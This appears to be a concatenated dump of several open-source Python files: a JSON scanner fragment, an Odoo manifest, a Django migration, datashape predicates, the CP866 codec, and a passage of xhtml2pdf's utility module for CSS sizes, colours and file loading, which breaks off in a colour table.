elif nextchar == 't' and string[idx:idx + 4] == 'true':
return True, idx + 4
elif nextchar == 'f' and string[idx:idx + 5] == 'false':
return False, idx + 5
m = match_number(string, idx)
if m is not None:
integer, frac, exp = m.groups()
if frac or exp:
res = parse_float(integer + (frac or '') + (exp or ''))
else:
res = parse_int(integer)
return res, m.end()
elif nextchar == 'N' and string[idx:idx + 3] == 'NaN':
return parse_constant('NaN'), idx + 3
elif nextchar == 'I' and string[idx:idx + 8] == 'Infinity':
return parse_constant('Infinity'), idx + 8
elif nextchar == '-' and string[idx:idx + 9] == '-Infinity':
return parse_constant('-Infinity'), idx + 9
else:
raise StopIteration
return _scan_once
make_scanner = c_make_scanner or py_make_scanner
|
waytai/odoo
|
refs/heads/8.0
|
addons/base_geolocalize/__openerp__.py
|
211
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013_Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Partners Geo-Localization',
'version': '1.0',
'category': 'Customer Relationship Management',
'description': """
Partners geolocalization
========================
""",
'author': 'OpenERP SA',
'depends': ['crm'],
'demo': [
],
'data': [
'views/res_partner_view.xml',
],
'test': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
rdonnelly/ultimate-league-app
|
refs/heads/master
|
src/ultimate/index/migrations/0003_auto_20170416_2031.py
|
2
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('index', '0002_staticcontent_type'),
]
operations = [
migrations.AddField(
model_name='staticcontent',
name='created',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AddField(
model_name='staticcontent',
name='updated',
field=models.DateTimeField(auto_now=True, null=True),
),
]
|
aterrel/datashape
|
refs/heads/master
|
datashape/predicates.py
|
1
|
from .util import collect, dshape
from .internal_utils import remove
from .coretypes import *
# https://github.com/ContinuumIO/datashape/blob/master/docs/source/types.rst
__all__ = ['isdimension', 'ishomogeneous', 'istabular', 'isfixed']
dimension_types = (Fixed, Var, Ellipsis)
isunit = lambda x: isinstance(x, Unit)
def isdimension(ds):
""" Is a component a dimension?
>>> isdimension(Fixed(10))
True
>>> isdimension(Var())
True
>>> isdimension(int32)
False
"""
return isinstance(ds, dimension_types)
def ishomogeneous(ds):
""" Does datashape contain only one dtype?
>>> ishomogeneous(int32)
True
>>> ishomogeneous('var * 3 * string')
True
>>> ishomogeneous('var * {name: string, amount: int}')
False
"""
ds = dshape(ds)
return len(set(remove(isdimension, collect(isunit, ds)))) == 1
def _dimensions(ds):
""" Number of dimensions of datashape
Interprets records as dimensional
>>> _dimensions(int32)
0
>>> _dimensions(10 * int32)
1
>>> _dimensions('var * 10 * int')
2
>>> _dimensions('var * {name: string, amount: int}')
2
"""
ds = dshape(ds)
if isdimension(ds[0]):
return 1 + _dimensions(ds.subarray(1))
if isinstance(ds[0], Record):
return 1 + max(map(_dimensions, ds[0].fields.values()))
if len(ds) == 1 and isunit(ds[0]):
return 0
raise NotImplementedError('Can not compute dimensions for %s' % ds)
def isfixed(ds):
""" Contains no variable dimensions
>>> isfixed('10 * int')
True
>>> isfixed('var * int')
False
>>> isfixed('10 * {name: string, amount: int}')
True
>>> isfixed('10 * {name: string, amounts: var * int}')
False
"""
ds = dshape(ds)
if isinstance(ds[0], TypeVar):
return None # don't know
if isinstance(ds[0], Var):
return False
if isinstance(ds[0], Record):
return all(map(isfixed, ds[0].fields.values()))
if len(ds) > 1:
return isfixed(ds.subarray(1))
return True
def istabular(ds):
""" Can be represented by a two dimensional with fixed columns
>>> istabular('var * 3 * int')
True
>>> istabular('var * {name: string, amount: int}')
True
>>> istabular('var * 10 * 3 * int')
False
>>> istabular('10 * var * int')
False
"""
ds = dshape(ds)
return _dimensions(ds) == 2 and isfixed(ds.subarray(1))
|
iniverno/RnR-LLC
|
refs/heads/master
|
simics-3.0-install/simics-3.0.31/amd64-linux/lib/python2.4/encodings/cp866.py
|
15
|
""" Python Character Mapping Codec generated from 'CP866.TXT' with gencodec.py.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
(c) Copyright 2000 Guido van Rossum.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_map)
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return (Codec().encode,Codec().decode,StreamReader,StreamWriter)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0410, # CYRILLIC CAPITAL LETTER A
0x0081: 0x0411, # CYRILLIC CAPITAL LETTER BE
0x0082: 0x0412, # CYRILLIC CAPITAL LETTER VE
0x0083: 0x0413, # CYRILLIC CAPITAL LETTER GHE
0x0084: 0x0414, # CYRILLIC CAPITAL LETTER DE
0x0085: 0x0415, # CYRILLIC CAPITAL LETTER IE
0x0086: 0x0416, # CYRILLIC CAPITAL LETTER ZHE
0x0087: 0x0417, # CYRILLIC CAPITAL LETTER ZE
0x0088: 0x0418, # CYRILLIC CAPITAL LETTER I
0x0089: 0x0419, # CYRILLIC CAPITAL LETTER SHORT I
0x008a: 0x041a, # CYRILLIC CAPITAL LETTER KA
0x008b: 0x041b, # CYRILLIC CAPITAL LETTER EL
0x008c: 0x041c, # CYRILLIC CAPITAL LETTER EM
0x008d: 0x041d, # CYRILLIC CAPITAL LETTER EN
0x008e: 0x041e, # CYRILLIC CAPITAL LETTER O
0x008f: 0x041f, # CYRILLIC CAPITAL LETTER PE
0x0090: 0x0420, # CYRILLIC CAPITAL LETTER ER
0x0091: 0x0421, # CYRILLIC CAPITAL LETTER ES
0x0092: 0x0422, # CYRILLIC CAPITAL LETTER TE
0x0093: 0x0423, # CYRILLIC CAPITAL LETTER U
0x0094: 0x0424, # CYRILLIC CAPITAL LETTER EF
0x0095: 0x0425, # CYRILLIC CAPITAL LETTER HA
0x0096: 0x0426, # CYRILLIC CAPITAL LETTER TSE
0x0097: 0x0427, # CYRILLIC CAPITAL LETTER CHE
0x0098: 0x0428, # CYRILLIC CAPITAL LETTER SHA
0x0099: 0x0429, # CYRILLIC CAPITAL LETTER SHCHA
0x009a: 0x042a, # CYRILLIC CAPITAL LETTER HARD SIGN
0x009b: 0x042b, # CYRILLIC CAPITAL LETTER YERU
0x009c: 0x042c, # CYRILLIC CAPITAL LETTER SOFT SIGN
0x009d: 0x042d, # CYRILLIC CAPITAL LETTER E
0x009e: 0x042e, # CYRILLIC CAPITAL LETTER YU
0x009f: 0x042f, # CYRILLIC CAPITAL LETTER YA
0x00a0: 0x0430, # CYRILLIC SMALL LETTER A
0x00a1: 0x0431, # CYRILLIC SMALL LETTER BE
0x00a2: 0x0432, # CYRILLIC SMALL LETTER VE
0x00a3: 0x0433, # CYRILLIC SMALL LETTER GHE
0x00a4: 0x0434, # CYRILLIC SMALL LETTER DE
0x00a5: 0x0435, # CYRILLIC SMALL LETTER IE
0x00a6: 0x0436, # CYRILLIC SMALL LETTER ZHE
0x00a7: 0x0437, # CYRILLIC SMALL LETTER ZE
0x00a8: 0x0438, # CYRILLIC SMALL LETTER I
0x00a9: 0x0439, # CYRILLIC SMALL LETTER SHORT I
0x00aa: 0x043a, # CYRILLIC SMALL LETTER KA
0x00ab: 0x043b, # CYRILLIC SMALL LETTER EL
0x00ac: 0x043c, # CYRILLIC SMALL LETTER EM
0x00ad: 0x043d, # CYRILLIC SMALL LETTER EN
0x00ae: 0x043e, # CYRILLIC SMALL LETTER O
0x00af: 0x043f, # CYRILLIC SMALL LETTER PE
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x0440, # CYRILLIC SMALL LETTER ER
0x00e1: 0x0441, # CYRILLIC SMALL LETTER ES
0x00e2: 0x0442, # CYRILLIC SMALL LETTER TE
0x00e3: 0x0443, # CYRILLIC SMALL LETTER U
0x00e4: 0x0444, # CYRILLIC SMALL LETTER EF
0x00e5: 0x0445, # CYRILLIC SMALL LETTER HA
0x00e6: 0x0446, # CYRILLIC SMALL LETTER TSE
0x00e7: 0x0447, # CYRILLIC SMALL LETTER CHE
0x00e8: 0x0448, # CYRILLIC SMALL LETTER SHA
0x00e9: 0x0449, # CYRILLIC SMALL LETTER SHCHA
0x00ea: 0x044a, # CYRILLIC SMALL LETTER HARD SIGN
0x00eb: 0x044b, # CYRILLIC SMALL LETTER YERU
0x00ec: 0x044c, # CYRILLIC SMALL LETTER SOFT SIGN
0x00ed: 0x044d, # CYRILLIC SMALL LETTER E
0x00ee: 0x044e, # CYRILLIC SMALL LETTER YU
0x00ef: 0x044f, # CYRILLIC SMALL LETTER YA
0x00f0: 0x0401, # CYRILLIC CAPITAL LETTER IO
0x00f1: 0x0451, # CYRILLIC SMALL LETTER IO
0x00f2: 0x0404, # CYRILLIC CAPITAL LETTER UKRAINIAN IE
0x00f3: 0x0454, # CYRILLIC SMALL LETTER UKRAINIAN IE
0x00f4: 0x0407, # CYRILLIC CAPITAL LETTER YI
0x00f5: 0x0457, # CYRILLIC SMALL LETTER YI
0x00f6: 0x040e, # CYRILLIC CAPITAL LETTER SHORT U
0x00f7: 0x045e, # CYRILLIC SMALL LETTER SHORT U
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x2116, # NUMERO SIGN
0x00fd: 0x00a4, # CURRENCY SIGN
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Encoding Map
encoding_map = codecs.make_encoding_map(decoding_map)
|
Ashaba/rms
|
refs/heads/master
|
rmslocalenv/lib/python2.7/site-packages/xhtml2pdf/util.py
|
23
|
# -*- coding: utf-8 -*-
from reportlab.lib.colors import Color, CMYKColor, getAllNamedColors, toColor, \
HexColor
from reportlab.lib.enums import TA_LEFT, TA_CENTER, TA_RIGHT, TA_JUSTIFY
from reportlab.lib.units import inch, cm
import base64
import httplib
import logging
import mimetypes
import os.path
import re
import reportlab
import shutil
import string
import sys
import tempfile
import types
import urllib
import urllib2
import urlparse
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
rgb_re = re.compile("^.*?rgb[(]([0-9]+).*?([0-9]+).*?([0-9]+)[)].*?[ ]*$")
_reportlab_version = tuple(map(int, reportlab.Version.split('.')))
if _reportlab_version < (2,1):
raise ImportError("Reportlab Version 2.1+ is needed!")
REPORTLAB22 = _reportlab_version >= (2, 2)
# print "***", reportlab.Version, REPORTLAB22, reportlab.__file__
log = logging.getLogger("xhtml2pdf")
try:
import cStringIO as StringIO
except:
import StringIO
try:
import PyPDF2
except:
PyPDF2 = None
try:
from reportlab.graphics import renderPM
except:
renderPM = None
try:
from reportlab.graphics import renderSVG
except:
renderSVG = None
#===============================================================================
# Memoize decorator
#===============================================================================
class memoized(object):
"""
A kwargs-aware memoizer, better than the one in python :)
Don't pass in too large kwargs, since this turns them into a tuple of tuples
Also, avoid mutable types (as usual for memoizers)
What this does is to create a dictionnary of {(*parameters):return value},
and uses it as a cache for subsequent calls to the same method.
It is especially useful for functions that don't rely on external variables
and that are called often. It's a perfect match for our getSize etc...
"""
def __init__(self, func):
self.cache = {}
self.func = func
self.__doc__ = self.func.__doc__ # To avoid great confusion
self.__name__ = self.func.__name__ # This also avoids great confusion
def __call__(self, *args, **kwargs):
# Make sure the following line is not actually slower than what you're
# trying to memoize
args_plus = tuple(kwargs.iteritems())
key = (args, args_plus)
try:
if key not in self.cache:
res = self.func(*args, **kwargs)
self.cache[key] = res
return self.cache[key]
except TypeError:
# happens if any of the parameters is a list
return self.func(*args, **kwargs)
def ErrorMsg():
"""
Helper to get a nice traceback as string
"""
import traceback, sys
type = value = tb = limit = None
type, value, tb = sys.exc_info()
list = traceback.format_tb(tb, limit) + traceback.format_exception_only(type, value)
return "Traceback (innermost last):\n" + "%-20s %s" % (
string.join(list[: - 1], ""),
list[- 1])
def toList(value):
if type(value) not in (types.ListType, types.TupleType):
return [value]
return list(value)
@memoized
def getColor(value, default=None):
"""
Convert to color value.
This returns a Color object instance from a text bit.
"""
if isinstance(value, Color):
return value
value = str(value).strip().lower()
if value == "transparent" or value == "none":
return default
if value in COLOR_BY_NAME:
return COLOR_BY_NAME[value]
if value.startswith("#") and len(value) == 4:
value = "#" + value[1] + value[1] + value[2] + value[2] + value[3] + value[3]
elif rgb_re.search(value):
# e.g., value = "<css function: rgb(153, 51, 153)>", go figure:
r, g, b = [int(x) for x in rgb_re.search(value).groups()]
value = "#%02x%02x%02x" % (r, g, b)
else:
# Shrug
pass
return toColor(value, default) # Calling the reportlab function
def getBorderStyle(value, default=None):
# log.debug(value)
if value and (str(value).lower() not in ("none", "hidden")):
return value
return default
mm = cm / 10.0
dpi96 = (1.0 / 96.0 * inch)
_absoluteSizeTable = {
"1": 50.0 / 100.0,
"xx-small": 50.0 / 100.0,
"x-small": 50.0 / 100.0,
"2": 75.0 / 100.0,
"small": 75.0 / 100.0,
"3": 100.0 / 100.0,
"medium": 100.0 / 100.0,
"4": 125.0 / 100.0,
"large": 125.0 / 100.0,
"5": 150.0 / 100.0,
"x-large": 150.0 / 100.0,
"6": 175.0 / 100.0,
"xx-large": 175.0 / 100.0,
"7": 200.0 / 100.0,
"xxx-large": 200.0 / 100.0,
}
_relativeSizeTable = {
"larger": 1.25,
"smaller": 0.75,
"+4": 200.0 / 100.0,
"+3": 175.0 / 100.0,
"+2": 150.0 / 100.0,
"+1": 125.0 / 100.0,
"-1": 75.0 / 100.0,
"-2": 50.0 / 100.0,
"-3": 25.0 / 100.0,
}
MIN_FONT_SIZE = 1.0
@memoized
def getSize(value, relative=0, base=None, default=0.0):
"""
Converts strings to standard sizes.
That is the function taking a string of CSS size ('12pt', '1cm' and so on)
and converts it into a float in a standard unit (in our case, points).
>>> getSize('12pt')
12.0
>>> getSize('1cm')
28.346456692913385
"""
try:
original = value
if value is None:
return relative
elif type(value) is types.FloatType:
return value
elif isinstance(value, int):
return float(value)
elif type(value) in (types.TupleType, types.ListType):
value = "".join(value)
value = str(value).strip().lower().replace(",", ".")
if value[-2:] == 'cm':
return float(value[:-2].strip()) * cm
elif value[-2:] == 'mm':
return float(value[:-2].strip()) * mm # 1mm = 0.1cm
elif value[-2:] == 'in':
return float(value[:-2].strip()) * inch # 1pt == 1/72inch
elif value[-2:] == 'inch':
return float(value[:-4].strip()) * inch # 1pt == 1/72inch
elif value[-2:] == 'pt':
return float(value[:-2].strip())
elif value[-2:] == 'pc':
return float(value[:-2].strip()) * 12.0 # 1pc == 12pt
elif value[-2:] == 'px':
return float(value[
:-2].strip()) * dpi96 # XXX W3C says, use 96pdi http://www.w3.org/TR/CSS21/syndata.html#length-units
elif value[-1:] == 'i': # 1pt == 1/72inch
return float(value[:-1].strip()) * inch
elif value in ("none", "0", "auto"):
return 0.0
elif relative:
if value[-2:] == 'em': # XXX
return float(value[:-2].strip()) * relative # 1em = 1 * fontSize
elif value[-2:] == 'ex': # XXX
return float(value[:-2].strip()) * (relative / 2.0) # 1ex = 1/2 fontSize
elif value[-1:] == '%':
return (relative * float(value[:-1].strip())) / 100.0 # 1% = (fontSize * 1) / 100
elif value in ("normal", "inherit"):
return relative
elif value in _relativeSizeTable:
if base:
return max(MIN_FONT_SIZE, base * _relativeSizeTable[value])
return max(MIN_FONT_SIZE, relative * _relativeSizeTable[value])
elif value in _absoluteSizeTable:
if base:
return max(MIN_FONT_SIZE, base * _absoluteSizeTable[value])
return max(MIN_FONT_SIZE, relative * _absoluteSizeTable[value])
else:
return max(MIN_FONT_SIZE, relative * float(value))
try:
value = float(value)
except:
log.warn("getSize: Not a float %r", value)
return default # value = 0
return max(0, value)
except Exception:
log.warn("getSize %r %r", original, relative, exc_info=1)
return default
@memoized
def getCoords(x, y, w, h, pagesize):
"""
As a stupid programmer I like to use the upper left
corner of the document as the 0,0 coords therefore
we need to do some fancy calculations
"""
#~ print pagesize
ax, ay = pagesize
if x < 0:
x = ax + x
if y < 0:
y = ay + y
if w != None and h != None:
if w <= 0:
w = (ax - x + w)
if h <= 0:
h = (ay - y + h)
return x, (ay - y - h), w, h
return x, (ay - y)
@memoized
def getBox(box, pagesize):
"""
Parse sizes by corners in the form:
<X-Left> <Y-Upper> <Width> <Height>
The last to values with negative values are interpreted as offsets form
the right and lower border.
"""
box = str(box).split()
if len(box) != 4:
raise Exception, "box not defined right way"
x, y, w, h = [getSize(pos) for pos in box]
return getCoords(x, y, w, h, pagesize)
def getFrameDimensions(data, page_width, page_height):
"""Calculate dimensions of a frame
Returns left, top, width and height of the frame in points.
"""
box = data.get("-pdf-frame-box", [])
if len(box) == 4:
return [getSize(x) for x in box]
top = getSize(data.get("top", 0))
left = getSize(data.get("left", 0))
bottom = getSize(data.get("bottom", 0))
right = getSize(data.get("right", 0))
if "height" in data:
height = getSize(data["height"])
if "top" in data:
top = getSize(data["top"])
bottom = page_height - (top + height)
elif "bottom" in data:
bottom = getSize(data["bottom"])
top = page_height - (bottom + height)
if "width" in data:
width = getSize(data["width"])
if "left" in data:
left = getSize(data["left"])
right = page_width - (left + width)
elif "right" in data:
right = getSize(data["right"])
left = page_width - (right + width)
top += getSize(data.get("margin-top", 0))
left += getSize(data.get("margin-left", 0))
bottom += getSize(data.get("margin-bottom", 0))
right += getSize(data.get("margin-right", 0))
width = page_width - (left + right)
height = page_height - (top + bottom)
return left, top, width, height
@memoized
def getPos(position, pagesize):
"""
Pair of coordinates
"""
position = str(position).split()
if len(position) != 2:
raise Exception, "position not defined right way"
x, y = [getSize(pos) for pos in position]
return getCoords(x, y, None, None, pagesize)
def getBool(s):
" Is it a boolean? "
return str(s).lower() in ("y", "yes", "1", "true")
_uid = 0
def getUID():
" Unique ID "
global _uid
_uid += 1
return str(_uid)
_alignments = {
"left": TA_LEFT,
"center": TA_CENTER,
"middle": TA_CENTER,
"right": TA_RIGHT,
"justify": TA_JUSTIFY,
}
def getAlign(value, default=TA_LEFT):
return _alignments.get(str(value).lower(), default)
GAE = "google.appengine" in sys.modules
if GAE:
STRATEGIES = (
StringIO.StringIO,
StringIO.StringIO)
else:
STRATEGIES = (
StringIO.StringIO,
tempfile.NamedTemporaryFile)
class pisaTempFile(object):
"""
A temporary file implementation that uses memory unless
either capacity is breached or fileno is requested, at which
point a real temporary file will be created and the relevant
details returned
If capacity is -1 the second strategy will never be used.
Inspired by:
http://code.activestate.com/recipes/496744/
"""
STRATEGIES = STRATEGIES
CAPACITY = 10 * 1024
def __init__(self, buffer="", capacity=CAPACITY):
"""Creates a TempFile object containing the specified buffer.
If capacity is specified, we use a real temporary file once the
file gets larger than that size. Otherwise, the data is stored
in memory.
"""
self.capacity = capacity
self.strategy = int(len(buffer) > self.capacity)
try:
self._delegate = self.STRATEGIES[self.strategy]()
except:
# Fallback for Google AppEnginge etc.
self._delegate = self.STRATEGIES[0]()
self.write(buffer)
# we must set the file's position for preparing to read
self.seek(0)
def makeTempFile(self):
"""
Switch to next startegy. If an error occured stay with the first strategy
"""
if self.strategy == 0:
try:
new_delegate = self.STRATEGIES[1]()
new_delegate.write(self.getvalue())
self._delegate = new_delegate
self.strategy = 1
log.warn("Created temporary file %s", self.name)
except:
self.capacity = - 1
def getFileName(self):
"""
Get a named temporary file
"""
self.makeTempFile()
return self.name
def fileno(self):
"""
Forces this buffer to use a temporary file as the underlying.
object and returns the fileno associated with it.
"""
self.makeTempFile()
return self._delegate.fileno()
def getvalue(self):
"""
Get value of file. Work around for second strategy
"""
if self.strategy == 0:
return self._delegate.getvalue()
self._delegate.flush()
self._delegate.seek(0)
return self._delegate.read()
def write(self, value):
"""
If capacity != -1 and length of file > capacity it is time to switch
"""
if self.capacity > 0 and self.strategy == 0:
len_value = len(value)
if len_value >= self.capacity:
needs_new_strategy = True
else:
self.seek(0, 2) # find end of file
needs_new_strategy = \
(self.tell() + len_value) >= self.capacity
if needs_new_strategy:
self.makeTempFile()
self._delegate.write(value)
def __getattr__(self, name):
try:
return getattr(self._delegate, name)
except AttributeError:
# hide the delegation
e = "object '%s' has no attribute '%s'" \
% (self.__class__.__name__, name)
raise AttributeError(e)
_rx_datauri = re.compile("^data:(?P<mime>[a-z]+/[a-z]+);base64,(?P<data>.*)$", re.M | re.DOTALL)
class pisaFileObject:
"""
XXX
"""
def __init__(self, uri, basepath=None):
self.basepath = basepath
self.mimetype = None
self.file = None
self.data = None
self.uri = None
self.local = None
self.tmp_file = None
uri = uri.encode('utf-8')
log.debug("FileObject %r, Basepath: %r", uri, basepath)
# Data URI
if uri.startswith("data:"):
m = _rx_datauri.match(uri)
self.mimetype = m.group("mime")
self.data = base64.decodestring(m.group("data"))
else:
# Check if we have an external scheme
if basepath and not urlparse.urlparse(uri).scheme:
urlParts = urlparse.urlparse(basepath)
else:
urlParts = urlparse.urlparse(uri)
log.debug("URLParts: %r", urlParts)
if urlParts.scheme == 'file':
if basepath and uri.startswith('/'):
uri = urlparse.urljoin(basepath, uri[1:])
urlResponse = urllib2.urlopen(uri)
self.mimetype = urlResponse.info().get("Content-Type", '').split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
# Drive letters have len==1 but we are looking for things like http:
elif urlParts.scheme in ('http', 'https'):
# External data
if basepath:
uri = urlparse.urljoin(basepath, uri)
#path = urlparse.urlsplit(url)[2]
#mimetype = getMimeType(path)
# Using HTTPLIB
server, path = urllib.splithost(uri[uri.find("//"):])
if uri.startswith("https://"):
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.request("GET", path)
r1 = conn.getresponse()
# log.debug("HTTP %r %r %r %r", server, path, uri, r1)
if (r1.status, r1.reason) == (200, "OK"):
self.mimetype = r1.getheader("Content-Type", '').split(";")[0]
self.uri = uri
if r1.getheader("content-encoding") == "gzip":
import gzip
try:
import cStringIO as StringIO
except:
import StringIO
self.file = gzip.GzipFile(mode="rb", fileobj=StringIO.StringIO(r1.read()))
else:
self.file = r1
else:
try:
urlResponse = urllib2.urlopen(uri)
except urllib2.HTTPError:
return
self.mimetype = urlResponse.info().get("Content-Type", '').split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
else:
# Local data
if basepath:
uri = os.path.normpath(os.path.join(basepath, uri))
if os.path.isfile(uri):
self.uri = uri
self.local = uri
self.setMimeTypeByName(uri)
self.file = open(uri, "rb")
def getFile(self):
if self.file is not None:
return self.file
if self.data is not None:
return pisaTempFile(self.data)
return None
def getNamedFile(self):
if self.notFound():
return None
if self.local:
return str(self.local)
if not self.tmp_file:
self.tmp_file = tempfile.NamedTemporaryFile()
if self.file:
shutil.copyfileobj(self.file, self.tmp_file)
else:
self.tmp_file.write(self.getData())
self.tmp_file.flush()
return self.tmp_file.name
def getData(self):
if self.data is not None:
return self.data
if self.file is not None:
self.data = self.file.read()
return self.data
return None
def notFound(self):
return (self.file is None) and (self.data is None)
def setMimeTypeByName(self, name):
" Guess the mime type "
mimetype = mimetypes.guess_type(name)[0]
if mimetype is not None:
self.mimetype = mimetypes.guess_type(name)[0].split(";")[0]
def getFile(*a, **kw):
file = pisaFileObject(*a, **kw)
if file.notFound():
return None
return file
COLOR_BY_NAME = {
'activeborder': Color(212, 208, 200),
'activecaption': Color(10, 36, 106),
'aliceblue': Color(.941176, .972549, 1),
'antiquewhite': Color(.980392, .921569, .843137),
'appworkspace': Color(128, 128, 128),
'aqua': Color(0, 1, 1),
'aquamarine': Color(.498039, 1, .831373),
'azure': Color(.941176, 1, 1),
'background': Color(58, 110, 165),
'beige': Color(.960784, .960784, .862745),
'bisque': Color(1, .894118, .768627),
'black': Color(0, 0, 0),
'blanchedalmond': Color(1, .921569, .803922),
'blue': Color(0, 0, 1),
'blueviolet': Color(.541176, .168627, .886275),
'brown': Color(.647059, .164706, .164706),
'burlywood': Color(.870588, .721569, .529412),
'buttonface': Color(212, 208, 200),
'buttonhighlight': Color(255, 255, 255),
'buttonshadow': Color(128, 128, 128),
'buttontext': Color(0, 0, 0),
'cadetblue': Color(.372549, .619608, .627451),
'captiontext': Color(255, 255, 255),
'chartreuse': Color(.498039, 1, 0),
'chocolate': Color(.823529, .411765, .117647),
'coral': Color(1, .498039, .313725),
'cornflowerblue': Color(.392157, .584314, .929412),
'cornsilk': Color(1, .972549, .862745),
'crimson': Color(.862745, .078431, .235294),
'cyan': Color(0, 1, 1),
'darkblue': Color(0, 0, .545098),
'darkcyan': Color(0, .545098, .545098),
'darkgoldenrod': Color(.721569, .52549, .043137),
'darkgray': Color(.662745, .662745, .662745),
'darkgreen': Color(0, .392157, 0),
'darkgrey': Color(.662745, .662745, .662745),
'darkkhaki': Color(.741176, .717647, .419608),
'darkmagenta': Color(.545098, 0, .545098),
'darkolivegreen': Color(.333333, .419608, .184314),
'darkorange': Color(1, .54902, 0),
'darkorchid': Color(.6, .196078, .8),
